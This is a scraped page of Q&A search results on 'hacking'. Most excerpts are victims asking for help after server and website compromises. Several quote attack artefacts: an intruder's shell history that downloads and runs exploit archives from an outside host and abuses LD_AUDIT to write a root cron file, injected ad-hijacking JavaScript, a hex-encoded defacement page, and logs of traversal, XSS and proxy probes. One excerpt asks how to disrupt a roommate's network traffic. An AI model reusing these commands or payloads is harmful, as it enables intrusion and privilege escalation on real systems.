Search Results

Search found 629 results on 26 pages for 'hacking'.

Page 6/26 | < Previous Page | 2 3 4 5 6 7 8 9 10 11 12 13  | Next Page >

  • Ubuntu Server hack

    - by haxpanel
    Hi! I looked at netstat and I noticed that someone besides me is connected to the server by ssh. I looked after this because my user has the only one ssh access. I found this in an ftp user .bash_history file: w uname -a ls -a sudo su wget qiss.ucoz.de/2010/.jpg wget qiss.ucoz.de/2010.jpg tar xzvf 2010.jpg rm -rf 2010.jpg cd 2010/ ls -a ./2010 ./2010x64 ./2.6.31 uname -a ls -a ./2.6.37-rc2 python rh2010.py cd .. ls -a rm -rf 2010/ ls -a wget qiss.ucoz.de/ubuntu2010_2.jpg tar xzvf ubuntu2010_2.jpg rm -rf ubuntu2010_2.jpg ./ubuntu2010-2 ./ubuntu2010-2 ./ubuntu2010-2 cat /etc/issue umask 0 dpkg -S /lib/libpcprofile.so ls -l /lib/libpcprofile.so LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping ping gcc touch a.sh nano a.sh vi a.sh vim wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh nano ubuntu10.sh ls -a rm -rf ubuntu10.sh . .. a.sh .cache ubuntu10.sh ubuntu2010-2 ls -a wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh ls -a rm -rf ubuntu10.sh wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe rm -rf W2Ksp3.exe passwd The system is in a jail. Does it matter in the current case? What shall i do? Thanks for everyone!! I have done these: - ban the connected ssh host with iptables - stoped the sshd in the jail - saved: bach_history, syslog, dmesg, files in the bash_history's wget lines

    Read the article

  • Someone used or hacked my computer to commit a crime? what defense do I have?

    - by srguws
    Hello, I need IMMEDIATE Help on a computer crime that I was arrested for. It may involve my computer, my ip, and my ex-girlfriend being the true criminal. The police do not tell you much they are very vague. I was charged though! So my questions are: -If someone did use my computer at my house and business and post a rude craigslist ad about a friend of my girlfriend at the time from a fake email address, how can I be the ONLY one as a suspect. Also how can I be charged. I noticed the last few days there are many ways to use other peoples computers, connections, etc. Here are a few things I found: You can steal or illegally use an ip addresss or mac address. Dynamic Ip is less secure and more vulnerable than static. People can sidejack and spoof your Mac, Ip, etc. There is another thing called arp spoofing. I am sure this is more things, but how can I prove that this happened to me or didnt happen to me. -The police contacted Craigslist, the victim, aol, and the two isp companies. They say they traced the IP's to my business and my home. My ex was who I lived with and had a business with has access to the computers and the keys to bothe buildings. My brother also lives and works with me. My business has many teenagers who use the computer and wifi. My brother is a college kid and also has friends over the house and they use the computer freely. So how can they say it was me because of an angry ex girlfriend.

    Read the article

  • My site was recently attacked. What do I do?

    - by ChrisH
    This is a first for me. One of the sites I run was recently attacked. Not at all an intelligent attack - pure brute force - hit every page and every non-page with every extension possible. Posted with garbage data to every form and tried to post to some random urls too. All tod, 16000 requests in one hour. What should I do to prevent/alert this kind of behavior? Is there a way to limit the request/hr for a given ip/client? Is there a place I should be reporting the user to? They appear to be from China and did leave what seems like a valid e-mail.

    Read the article

  • How to analyse logs after the site was hacked

    - by Vasiliy Toporov
    One of our web-projects was hacked. Malefactor changed some template files in project and 1 core file of the web-framework (it's one of the famous php-frameworks). We found all corrupted files by git and reverted them. So now I need to find the weak point. With high probability we can say, that it's not the ftp or ssh password abduction. The support specialist of hosting provider (after logs analysis) said that it was the security hole in our code. My questions: 1) What tools should I use, to review access and error logs of Apache? (Our server distro is Debian). 2) Can you write tips of suspicious lines detection in logs? Maybe tutorials or primers of some useful regexps or techniques? 3) How to separate "normal user behavior" from suspicious in logs. 4) Is there any way to preventing attacks in Apache? Thanks for your help.

    Read the article

  • Got Hacked. Want to understand how.

    - by gaoshan88
    Someone has, for the second time, appended a chunk of javascript to a site I help run. This javascript hijacks Google adsense, inserting their own account number, and sticking ads all over. The code is always appended, always in one specific directory (one used by a third party ad program), affects a number of files in a number of directories inside this one ad dir (20 or so) and is inserted at roughly the same overnight time. The adsense account belongs to a Chinese website (located in a town not an hour from where I will be in China next month. Maybe I should go bust heads... kidding, sort of), btw... here is the info on the site: http://serversiders.com/fhr.com.cn So, how could they append text to these files? Is it related to the permissions set on the files (ranging from 755 to 644)? To the webserver user (it's on MediaTemple so it should be secure, yes?)? I mean, if you have a file that has permissions set to 777 I still can't just add code to it at will... how might they be doing this? Here is a sample of the actual code for your viewing pleasure (and as you can see... not much to it. The real trick is how they got it in there): <script type="text/javascript"><!-- google_ad_client = "pub-5465156513898836"; /* 728x90_as */ google_ad_slot = "4840387765"; google_ad_width = 728; google_ad_height = 90; //--> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script> Since a number of folks have mentioned it, here is what I have checked (and by checked I mean I looked around the time the files were modified for any weirdness and I grepped the files for POST statements and directory traversals: access_log (nothing around the time except normal (i.e. excessive) msn bot traffic) error_log (nothing but the usual file does not exist errors for innocuous looking files) ssl_log (nothing but the usual) messages_log (no FTP access in here except for me)

    Read the article

  • IIS 7.5 website application pool with 'full control' permissions hackable?

    - by Caroline Beltran
    Although I would never set this permission, I would like to know how a static html website with the permission mentioned in the title could be compromised. In my humble opinion, I would guess that this would pose no threat since a web visitor has no way to upload/edit/delete anything. What if the site was a simple PHP website that simply displayed ‘hello world’? What if this PHP site had a contact us form that was properly sanitized? Thank you EDIT: I should mention that restricting IIS to GET and POST requests only, otherwise people anybody can delete and upload content.

    Read the article

  • Hacked website, code is encrypted in hex, unable to identify

    - by dhakad
    my web site hacked and i am getting code in index page, but i am unable to find that where is the code in my web site... %3c%68%74%6d%6c%3e%3c%68%65%61%64%3e%0d%0a%3c%6d%65%74%61%20%63%6f%6e%74%65%6e%74%3d%22%74%65%78%74%2f%68%74%6d%6c%3b%20%63%68%61%72%73%65%74%3d%75%74%66%2d%38%22%3e%0d%0a%3c%74%69%74%6c%65%3e%2e%2f%20%72%45%64%20%58%20%7c%20%33%78%70%31%72%33%20%43%79%62%65%72%20%41%72%6d%79%3c%2f%74%69%74%6c%65%3e%0d%0a%3c%6d%65%74%61%20%6e%61%6d%65%3d%22%61%75%74%68%6f%72%22%20%63%6f%6e%74%65%6e%74%3d%22%72%45%64%20%58%22%20%2f%3e%0d%0a%3c%6d%65%74%61%20%6e%61%6d%65%3d%22%6b%65%79%77%6f%72%64%73%22%20%63%6f%6e%74%65%6e%74%3d%22%72%45%64%20%58%2c%33%78%70%31%72%33%20%43%79%62%65%72%20%41%72%6d%79%2c%5a%6f%6e%65%2d%48%2c%42%61%6e%67%6c%61%64%65%73%68%69%20%48%61%63%6b%65%72%22%20%2f%3e%0d%0a%3c%6d%65%74%61%20%6e%61%6d%65%3d%22%64%65%73%63%72%69%70%74%69%6f%6e%22%20%63%6f%6e%74%65%6e%74%3d%22%5b%20%72%45%64%20%58%20%2e%2e%20%54%68%65%20%52%65%61%6c%20%4f%75%74%72%61%67%65%6f%75%73%20%5d%22%20%2f%3e%0d%0a%3c%6c%69%6e%6b%20%72%65%6c%3d%22%53%48%4f%52%54%43%55%54%20%49%43%4f%4e%22%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%75%73%2e%79%69%6d%67%2e%63%6f%6d%2f%69%2f%6d%65%73%67%2f%65%6d%6f%74%69%63%6f%6e%73%37%2f%36%31%2e%67%69%66%22%3e%0d%0a%3c%73%74%79%6c%65%20%74%79%70%65%3d%22%74%65%78%74%2f%63%73%73%22%3e%0d%0a%62%6f%64%79%20%7b%62%61%63%6b%67%72%6f%75%6e%64%2d%69%6d%61%67%65%3a%20%75%72%6c%28%68%74%74%70%3a%2f%2f%6d%65%64%69%61%2e%73%6f%6d%65%77%68%65%72%65%69%6e%62%6c%6f%67%2e%6e%65%74%2f%69%6d%61%67%65%73%2f%6f%6e%64%68%6f%6b%61%72%65%72%5f%72%61%6a%70%75%74%72%61%5f%31%33%33%38%32%35%30%34%33%31%5f%31%2d%62%67%2e%67%69%66%29%3b%0d%0a%62%61%63%6b%67%72%6f%75%6e%64%2d%63%6f%6c%6f%72%3a%20%62%6c%61%63%6b%3b%63%6f%6c%6f%72%3a%20%23%46%46%41%35%30%30%3b%66%6f%6e%74%2d%77%65%69%67%68%74%3a%20%62%6f%6c%64%3b%74%65%78%74%2d%61%6c%69%67%6e%3a%20%63%65%6e%74%65%72%3b%7d%0d%0a%69%6d%67%7b%6f%70%61%63%69%74%79%3a%30%2e%37%35%3b%20%66%69%6c%74%65%72%3a%61%6c%70%68%61%28%6f%70%61%63%69%74%79%3d%37%35%29%3b%7d%0d%0a%2e%72%65%64%78%20%7b%74%65%78%74%2d%73%68%61%64%6f%77%3a%20%30%20%30%20%36%70%78%20%72%65%64%2c%20%30%20%30%20%35%70%78%20%72%65%64%2c%20%30%20%30%20%35%70%78%20%72%65%64%3b%63%6f%6c%6f%72%3a%20%23%46%46%46%7d%0d%0a%3c%2f%73%74%79%6c%65%3e%0d%0a%3c%2f%68%65%61%64%3e%0d%0a%3c%62%6f%64%79%20%6f%6e%63%6f%6e%74%65%78%74%6d%65%6e%75%3d%22%72%65%74%75%72%6e%20%66%61%6c%73%65%22%20%6f%6e%6b%65%79%64%6f%77%6e%3d%22%72%65%74%75%72%6e%20%66%61%6c%73%65%22%20%6f%6e%6d%6f%75%73%65%64%6f%77%6e%3d%22%72%65%74%75%72%6e%20%66%61%6c%73%65%22%3e%0d%0a%3c%64%69%76%20%73%74%79%6c%65%3d%22%66%6f%6e%74%2d%66%61%6d%69%6c%79%3a%20%50%61%6c%61%74%69%6e%6f%20%4c%69%6e%6f%74%79%70%65%3b%66%6f%6e%74%2d%73%69%7a%65%3a%20%34%36%70%78%3b%22%20%63%6c%61%73%73%3d%22%72%65%64%78%22%3e%2e%3a%3a%20%72%45%64%20%58%20%57%61%73%20%48%65%72%65%20%3a%3a%2e%3c%2f%64%69%76%3e%3c%62%72%2f%3e%0d%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%6d%65%64%69%61%2e%73%6f%6d%65%77%68%65%72%65%69%6e%62%6c%6f%67%2e%6e%65%74%2f%69%6d%61%67%65%73%2f%6f%6e%64%68%6f%6b%61%72%65%72%5f%72%61%6a%70%75%74%72%61%5f%31%33%35%33%35%35%32%36%35%31%5f%31%2d%72%65%64%2d%78%2e%6a%70%67%22%3e%3c%62%72%2f%3e%0d%0a%3c%64%69%76%20%73%74%79%6c%65%3d%22%66%6f%6e%74%2d%66%61%6d%69%6c%79%3a%20%42%6f%6f%6b%6d%61%6e%20%4f%6c%64%20%53%74%79%6c%65%3b%63%6f%6c%6f%72%3a%20%23%30%30%30%3b%66%6f%6e%74%2d%73%69%7a%65%3a%20%32%30%70%78%3b%6d%61%72%67%69%6e%3a%30%3b%74%65%78%74%2d%73%68%61%64%6f%77%3a%20%30%20%31%70%78%20%33%70%78%20%23%30%30%46%46%30%30%2c%20%2d%31%70%78%20%30%20%33%70%78%20%23%30%30%46%46%30%30%2c%20%30%20%2d%31%70%78%20%33%70%78%20%23%30%30%46%46%30%30%2c%20%31%70%78%20%30%20%33%70%78%20%23%30%30%46%46%30%30%3b%22%3e%50%72%6f%75%64%20%54%6f%20%62%65%20%61%20%42%61%6e%67%6c%61%64%65%73%68%69%20%48%61%63%6b%65%72%3c%2f%64%69%76%3e%3c%62%72%2f%3e%0d%0a%3c%64%69%76%20%73%74%79%6c%65%3d%22%66%6f%6e%74%2d%66%61%6d%69%6c%79%3a%20%42%65%72%6c%69%6e%20%53%61%6e%73%20%46%42%3b%63%6f%6c%6f%72%3a%20%23%31%35%31%42%35%34%3b%66%6f%6e%74%2d%73%69%7a%65%3a%20%32%30%70%78%3b%74%65%78%74%2d%73%68%61%64%6f%77%3a%20%30%20%30%20%33%70%78%20%23%30%30%46%46%30%30%2c%20%30%20%30%20%33%70%78%20%23%30%30%46%46%30%30%2c%20%30%20%30%20%33%70%78%20%23%66%66%66%2c%20%30%20%30%20%35%70%78%20%23%46%30%30%2c%20%30%20%30%20%35%70%78%20%23%66%66%32%64%39%35%3b%22%3e%44%65%61%72%20%41%44%4d%49%4e%3c%62%72%2f%3e%21%20%53%65%63%75%72%65%20%79%6f%75%72%20%53%49%54%45%20%21%3c%2f%64%69%76%3e%3c%62%72%2f%3e%0d%0a%3c%64%69%76%20%73%74%79%6c%65%3d%22%66%6f%6e%74%2d%73%69%7a%65%3a%20%31%38%70%78%3b%66%6f%6e%74%2d%66%61%6d%69%6c%79%3a%20%43%65%6e%74%75%72%79%20%47%6f%74%68%69%63%3b%63%6f%6c%6f%72%3a%20%23%30%30%30%3b%74%65%78%74%2d%73%68%61%64%6f%77%3a%20%30%20%30%20%33%70%78%20%6c%69%6d%65%2c%20%30%20%30%20%33%70%78%20%6c%69%6d%65%2c%20%30%20%30%20%35%70%78%20%23%66%66%32%64%39%35%2c%20%30%20%30%20%35%70%78%20%23%66%66%32%64%39%35%3b%22%3e%72%65%64%2d%78%40%68%61%63%6b%65%72%6d%61%69%6c%2e%63%6f%6d%3c%2f%64%69%76%3e%0d%0a%3c%62%72%2f%3e%3c%64%69%76%20%73%74%79%6c%65%3d%22%66%6f%6e%74%2d%73%69%7a%65%3a%20%32%30%70%78%3b%22%3e%2e%2e%3a%3a%7c%20%47%72%65%65%74%7a%20%7c%3a%3a%2e%2e%3c%2f%64%69%76%3e%0d%0a%3c%64%69%76%20%73%74%79%6c%65%3d%22%66%6f%6e%74%2d%66%61%6d%69%6c%79%3a%20%42%6f%6f%6b%20%41%6e%74%69%71%75%61%3b%63%6f%6c%6f%72%3a%20%67%72%65%79%3b%66%6f%6e%74%2d%73%69%7a%65%3a%20%32%30%70%78%3b%74%65%78%74%2d%73%68%61%64%6f%77%3a%20%72%65%64%20%31%70%78%20%2d%30%70%78%20%36%70%78%22%3e%2e%3a%3a%20%78%33%6f%2d%31%33%33%37%20%7c%20%47%61%62%62%79%20%7c%20%24%70%21%72%21%74%7e%24%33%33%6b%33%72%20%7c%20%46%72%45%61%4b%79%20%3a%3a%2e%3c%62%72%2f%3e%41%6c%6c%20%4d%65%6d%62%65%72%73%20%6f%66%20%33%78%70%31%72%33%20%43%79%62%65%72%20%41%72%6d%79%3c%2f%64%69%76%3e%3c%62%72%2f%3e%0d%0a%3c%65%6d%62%65%64%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%79%6f%75%74%75%62%65%2e%67%6f%6f%67%6c%65%61%70%69%73%2e%63%6f%6d%2f%76%2f%70%74%5a%31%77%6f%33%4a%73%50%63%26%61%75%74%6f%70%6c%61%79%3d%31%26%6c%6f%6f%70%3d%31%22%20%74%79%70%65%3d%22%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%73%68%6f%63%6b%77%61%76%65%2d%66%6c%61%73%68%22%20%77%6d%6f%64%65%3d%22%74%72%61%6e%73%70%61%72%65%6e%74%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%62%6f%64%79%3e%3c%2f%68%74%6d%6c%3e'

    Read the article

  • Is there a peripheral that lets my computer monitor the connectivity of pairs of wires?

    - by raldi
    I've got a bunch of physical switches and circuits that act like switches (they're either connected to ground or they're just an open wire). Is there some sort of thing I can plug into my computer (ideally, via USB) that has a bunch of screw terminals, and I can attach wires to the screws and have the computer keep track of which circuits are closed and which are open? Bonus points if the device also lets the computer open and close switches, too. I don't even know what to google for.

    Read the article

  • is there any valid reason for users to request phpinfo()

    - by The Journeyman geek
    I'm working on writing a set of rules for fail2ban to make life a little more interesting for whoever is trying to bruteforce his way into my system. A good majority of the attempts tend to revolve around trying to get into phpinfo() via my webserver -as below GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1 GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1 GET //dbadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1 GET //mysql/config/config.inc.php?p=phpinfo(); HTTP/1.1 I'm wondering if there's any valid reason for a user to attempt to access phpinfo() via apache, since if not, i can simply use that, or more specifically the regex GET //[^>]+=phpinfo\(\) as a filter to eliminate these attacks

    Read the article

  • How can I disrupt my roommate's BitTorrent?

    - by bob
    We're on a 50 mb/s Comcast connection and our connection right now is coming in under 1.5 mb/s. Our roommate left for a week with BitTorrent running (Azureus client, we think). Our latency is approaching 300 ms. His door is locked up tight, and both his machine and the router for the house are located inside. I've even flipped the power breaker in the house and that barely works for 2 minutes. His laptop keeps on running, and once the cable modem and router come back up and the machine reconnects, the torrents resume in earnest. I've been running nmap and identified his IP on our LAN. Is there anything I can do over the LAN to make his torrents start to fail or slow down?

    Read the article

  • Would SSL prevent replay tampering by the authenticated user

    - by Coder 42
    In the context of a game (HTML5/Flash/Silverlight) which sends data to an online service to record progress (e.g. player killed an orc), would communicating with the service over SSL implicitly prevent the player from recording and replaying the message? I know SSL includes a nonce, but does it remain constant for the duration of the connection or does it change after each request/response cycle?

    Read the article

  • Attempted hack on VPS, how to protect in future, what were they trying to do?

    - by Moin Zaman
    UPDATE: They're still here. Help me stop or trap them! Hi SF'ers, I've just had someone hack one of my clients sites. They managed to get to change a file so that the checkout page on the site writes payment information to a text file. Fortunately or unfortunately they stuffed up, the had a typo in the code, which broke the site so I came to know about it straight away. I have some inkling as to how they managed to do this: My website CMS has a File upload area where you can upload images and files to be used within the website. The uploads are limited to 2 folders. I found two suspicious files in these folders and on examining the contents it looks like these files allow the hacker to view the server's filesystem and upload their own files, modify files and even change registry keys?! I've deleted some files, and changed passwords and am in the process of trying to secure the CMS and limit file uploads by extensions. Anything else you guys can suggest I do to try and find out more details about how they got in and what else I can do to prevent this in future?

    Read the article

  • Someone try to hack my site, want to understand the log

    - by garconcn
    I have a wordpress site hosted on CentOS 6. After see the following access log, I checked the server, it seems ok. Can anyone explain what does this guy trying to do? Did they get what they want? I have disabled allow_url_include, and restricted open_basedir to web dir and tmp(/etc is not in the path). 190.26.208.130 - - [05/Sep/2012:21:24:42 -0700] "POST http://my_ip/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1" 200 32656 "-" "Mozilla/5.0"

    Read the article

  • My servers been hacked EMERGENCY

    - by Grant unwin
    I'm on my way into work at 9.30 pm on a Sunday because our server has been compromised somehow and was resulting in a DOS attack on our provider. The servers access to the Internet has been shut down which means over 5-600 of our clients sites are now down. Now this could be an FTP hack, or some weakness in code somewhere I'm not sure till j get there. Does anyone have any tips on how I can track this down quickly. Were in for a whole lot of litigation if I dont get the server back up asap. Any help appreciated.

    Read the article

  • Someone tried to hack my Node.js server, need to understand a GET request in the logs

    - by Akay
    Alright, so I left my Node.js server alone for a while and came back to find some really interesting stuff in the logs. Apparently some moron from China or Poland tried to hack my server using directory traversal and what not, while it seems though he did not succeed I am unable understand few entries in the log. This is the output of a "hohup.out" file. The attack starts, apparently he is trying to find out some console entry in my server. All of which fail and return a 404. [90mGET /../../../../../../../../../../../ [31m500 [90m6ms - 2b[0m [90mGET /<script>alert(53416)</script> [33m404 [90m7ms[0m [90mGET / [32m200 [90m2ms - 240b[0m [90mGET / [32m200 [90m1ms - 240b[0m [90mGET / [32m200 [90m2ms - 240b[0m [90mGET /pz3yvy3lyzgja41w2sp [33m404 [90m1ms[0m [90mGET /stylesheets/style.css [33m404 [90m0ms[0m [90mGET /index.html [33m404 [90m1ms[0m [90mGET /index.htm [33m404 [90m0ms[0m [90mGET /default.html [33m404 [90m0ms[0m [90mGET /default.htm [33m404 [90m1ms[0m [90mGET /default.asp [33m404 [90m1ms[0m [90mGET /index.php [33m404 [90m0ms[0m [90mGET /default.php [33m404 [90m1ms[0m [90mGET /index.asp [33m404 [90m0ms[0m [90mGET /index.cgi [33m404 [90m0ms[0m [90mGET /index.jsp [33m404 [90m1ms[0m [90mGET /index.php3 [33m404 [90m0ms[0m [90mGET /index.pl [33m404 [90m0ms[0m [90mGET /default.jsp [33m404 [90m0ms[0m [90mGET /default.php3 [33m404 [90m0ms[0m [90mGET /index.html.en [33m404 [90m0ms[0m [90mGET /web.gif [33m404 [90m34ms[0m [90mGET /header.html [33m404 [90m1ms[0m [90mGET /homepage.nsf [33m404 [90m1ms[0m [90mGET /homepage.htm [33m404 [90m1ms[0m [90mGET /homepage.asp [33m404 [90m1ms[0m [90mGET /home.htm [33m404 [90m0ms[0m [90mGET /home.html [33m404 [90m1ms[0m [90mGET /home.asp [33m404 [90m1ms[0m [90mGET /login.asp [33m404 [90m0ms[0m [90mGET /login.html [33m404 [90m0ms[0m [90mGET /login.htm [33m404 [90m1ms[0m [90mGET /login.php [33m404 [90m0ms[0m [90mGET /index.cfm [33m404 [90m0ms[0m [90mGET /main.php [33m404 [90m1ms[0m [90mGET /main.asp [33m404 [90m1ms[0m [90mGET /main.htm [33m404 [90m1ms[0m [90mGET /main.html [33m404 [90m2ms[0m [90mGET /Welcome.html [33m404 [90m1ms[0m [90mGET /welcome.htm [33m404 [90m1ms[0m [90mGET /start.htm [33m404 [90m1ms[0m [90mGET /fleur.png [33m404 [90m0ms[0m [90mGET /level/99/ [33m404 [90m1ms[0m [90mGET /chl.css [33m404 [90m0ms[0m [90mGET /images/ [33m404 [90m0ms[0m [90mGET /robots.txt [33m404 [90m2ms[0m [90mGET /hb1/presign.asp [33m404 [90m1ms[0m [90mGET /NFuse/ASP/login.htm [33m404 [90m0ms[0m [90mGET /CCMAdmin/main.asp [33m404 [90m1ms[0m [90mGET /TiVoConnect?Command=QueryServer [33m404 [90m1ms[0m [90mGET /admin/images/rn_logo.gif [33m404 [90m1ms[0m [90mGET /vncviewer.jar [33m404 [90m1ms[0m [90mGET / [32m200 [90m2ms - 240b[0m [90mGET / [32m200 [90m2ms - 240b[0m [90mGET / [32m200 [90m7ms - 240b[0m [90mOPTIONS / [32m200 [90m1ms - 3b[0m [90mTRACE / [33m404 [90m0ms[0m [90mPROPFIND / [33m404 [90m0ms[0m [90mGET /\./ [33m404 [90m1ms[0m But here is when things start getting fishy. [90mGET http://www.google.com/ [32m200 [90m2ms - 240b[0m [90mGET http://www.google.com/ [32m200 [90m1ms - 240b[0m [90mGET http://www.google.com/ [32m200 [90m1ms - 240b[0m [90mGET /manager/html [33m404 [90m1ms[0m [90mGET /manager/html [33m404 [90m1ms[0m [90mGET http://www.google.com/ [32m200 [90m1ms - 240b[0m [90mGET / [32m200 [90m2ms - 240b[0m [90mGET / [32m200 [90m1ms - 240b[0m [90mGET /robots.txt [33m404 [90m1ms[0m [90mGET /manager/html [33m404 [90m1ms[0m [90mGET http://www.google.com/ [32m200 [90m1ms - 240b[0m [90mGET /manager/html [33m404 [90m1ms[0m [90mGET /manager/html [33m404 [90m1ms[0m [90mGET /manager/html [33m404 [90m0ms[0m [90mGET /manager/html [33m404 [90m1ms[0m [90mGET /manager/html [33m404 [90m3ms[0m [90mGET /manager/html [33m404 [90m0ms[0m [90mGET /manager/html [33m404 [90m1ms[0m [90mGET /manager/html [33m404 [90m1ms[0m [90mGET /manager/html [33m404 [90m0ms[0m [90mGET http://www.google.com/ [32m200 [90m1ms - 240b[0m [90mGET http://37.28.156.211/sprawdza.php [33m404 [90m1ms[0m [90mGET http://www.google.com/ [32m200 [90m1ms - 240b[0m [90mGET /manager/html [33m404 [90m1ms[0m [90mGET http://www.google.com/ [32m200 [90m2ms - 240b[0m [90mHEAD / [32m200 [90m1ms - 240b[0m [90mGET http://www.daydaydata.com/proxy.txt [33m404 [90m19ms[0m [90mHEAD / [32m200 [90m1ms - 240b[0m [90mGET /manager/html [33m404 [90m2ms[0m [90mGET / [32m200 [90m4ms - 240b[0m [90mGET http://www.google.pl/search?q=wp.pl [33m404 [90m1ms[0m [90mGET /manager/html [33m404 [90m0ms[0m [90mHEAD / [32m200 [90m2ms - 240b[0m [90mGET http://www.google.pl/search?q=onet.pl [33m404 [90m1ms[0m [90mHEAD / [32m200 [90m2ms - 240b[0m [90mGET http://www.google.com/ [32m200 [90m1ms - 240b[0m [90mGET http://www.google.pl/search?q=ostro%C5%82%C4%99ka [33m404 [90m1ms[0m [90mGET http://www.google.pl/search?q=google [33m404 [90m1ms[0m [90mGET /manager/html [33m404 [90m1ms[0m [90mGET http://www.google.com/ [32m200 [90m2ms - 240b[0m [90mHEAD / [32m200 [90m2ms - 240b[0m [90mGET /manager/html [33m404 [90m1ms[0m [90mGET /manager/html [33m404 [90m0ms[0m [90mGET / [32m200 [90m2ms - 240b[0m [90mGET http://www.baidu.com/ [32m200 [90m2ms - 240b[0m [90mGET /manager/html [33m404 [90m1ms[0m [90mGET /manager/html [33m404 [90m1ms[0m [90mPOST /api/login [32m200 [90m1ms - 28b[0m [90mGET /web-console/ServerInfo.jsp [33m404 [90m2ms[0m [90mGET /manager/html [33m404 [90m1ms[0m [90mGET http://www.google.com/ [32m200 [90m10ms - 240b[0m [90mGET http://www.google.com/ [32m200 [90m1ms - 240b[0m [90mGET / [32m200 [90m2ms - 240b[0m [90mGET /manager/html [33m404 [90m1ms[0m [90mGET http://proxyjudge.info [32m200 [90m2ms - 240b[0m [90mGET / [32m200 [90m2ms - 240b[0m [90mGET / [32m200 [90m1ms - 240b[0m [90mGET http://www.google.com/ [32m200 [90m3ms - 240b[0m [90mGET http://www.google.com/ [32m200 [90m3ms - 240b[0m [90mGET http://www.baidu.com/ [32m200 [90m1ms - 240b[0m [90mGET /manager/html [33m404 [90m0ms[0m [90mGET /manager/html [33m404 [90m1ms[0m [90mGET http://www.google.com/ [32m200 [90m2ms - 240b[0m [90mHEAD / [32m200 [90m1ms - 240b[0m [90mGET http://www.google.com/ [32m200 [90m1ms - 240b[0m [90mGET http://www.google.com/search?tbo=d&source=hp&num=1&btnG=Search&q=niceman [33m404 [90m2ms[0m So my questions are, how come my server is returning a "200" OK for root level domains? How did the hacker even manage to send a GET request to my server such that "http://www.google.com" shows up in the log while my server is simply an API that works on relative URLs such as "/api/login". And, while I looked up the OPTIONS, TRACE and PROPFIND HTTP requests that my server has logged it would be great if someone could explain what exactly was the hacker trying to achieve by using these verbs? Also what in the world does "[90m [32m [90m1ms - 240b[0m" mean? The "ms" makes sense, probably milliseconds for the request, rest I am unable to understand. Thank you!

    Read the article

  • Server load increases by lot of httpd request with same PID

    - by user3740955
    I can see that my server load increases to more than 200-300 range. Before 1 week the maximum load was around 20-25. In top and ps -ef i can see a lot of httpd threads and the PPID of most of the httpd request are of the same PID. When i verified this the parent process ID is of root. Please let me know how i can reduce the server load. I have searched a lot for this but not able to find out a proper solution for this. Please let me know. Please see below a part of the top output. apache 29698 2062 1 16:54 ? 00:00:00 /usr/sbin/httpd apache 29700 2062 3 16:54 ? 00:00:00 /usr/sbin/httpd apache 29701 2062 10 16:54 ? 00:00:02 /usr/sbin/httpd apache 29702 2062 0 16:54 ? 00:00:00 /usr/sbin/httpd apache 29703 2062 1 16:54 ? 00:00:00 /usr/sbin/httpd apache 29705 2062 0 16:54 ? 00:00:00 /usr/sbin/httpd apache 29706 2062 3 16:54 ? 00:00:00 /usr/sbin/httpd apache 29707 2062 0 16:54 ? 00:00:00 /usr/sbin/httpd apache 29708 2062 1 16:54 ? 00:00:00 /usr/sbin/httpd apache 29709 2062 0 16:54 ? 00:00:00 /usr/sbin/httpd apache 29710 2062 0 16:54 ? 00:00:00 /usr/sbin/httpd apache 29711 2062 0 16:54 ? 00:00:00 /usr/sbin/httpd apache 29712 2062 0 16:54 ? 00:00:00 /usr/sbin/httpd Server version: Apache/2.2.3

    Read the article

  • Finding a way to enter gmail in Company

    - by stckvrflw1
    Hello all, I am entering network over DNS's of my company. Here my company blocks lots of IP's for reasons like entertainment, sports, music, messaging boards etc. General e-mail is also one of those topics and I can't enter gmail.com. The proxy sites are also blocked in the company and the one's I have found (by spending much afford) are not accepting cookies. Also I am not able to enter the gmail from Igoogle too, this is also blocked. How can I enter gmail ? Thanks.

    Read the article

  • Login code sample which has been hacked via SQL Injection, although mysql_real_escape_string...

    - by artmania
    Hi friends, I use CodeIgniter, and having trouble with hacking :( is it possible to make SQL Injection to the login code below: function process_login() { $username = mysql_real_escape_string($this->input->post('username')); $password = mysql_real_escape_string(MD5($this->input->post('password'))); //Check user table $query = $this->db->getwhere('users', array('username'=>$username, 'password'=>$password)); if ($query->num_rows() > 0) { // success login data Am I using the mysql_real_escape_string wrong? or what? Appreciate helps!

    Read the article

  • Rainbow Tables: How to improve upon them??

    - by CVS-2600Hertz-wordpress-com
    I recently obtained the l0pht-CD for windows and tried it out on my PC and It WORKS!! http://2600hertz.wordpress.com/2009/12/22/100-windows-xp-vista-7-password-recovery/ I have also read http://kestas.kuliukas.com/RainbowTables/ I'm designing a "Login-Simulator" that stores pwd-s in a similar manner. The current implementation will be vulnerable to the above attack. Plz could anyone illustrate (in as simple terms as possible), how to strengthen the rainbow tables against such an attack. MY GOAL : Build "Login-Simulator" to be as secure as possible. (Read Hacking Competition ;-) ) Thank You.

    Read the article

  • How to change socket bind port of program? without source code.

    - by hunmr
    Hello everyone, PROBLEM: I have a program dummy.exe on windows. this program will bind to UDP port 5060, after started. but another program also want to bind port 5060. WHAT I HAVE DONE: using windbg to start dummy.exe, and set breakpoint on ws2_32!bind when the breakpoint hit, i changed the parameter (port value) with command ew this dummy.exe will bind to the new port, and worked well. QUESTION: How can i do that easily? write a simple windows debugger? Maybe i can hacking or modify the dummy.exe file, but how to do that? what's your way to achieve this? thanks

    Read the article

  • My Website was hacked using Statcounter! Does Statcounter keep a record of cookies?

    - by Cyril Gupta
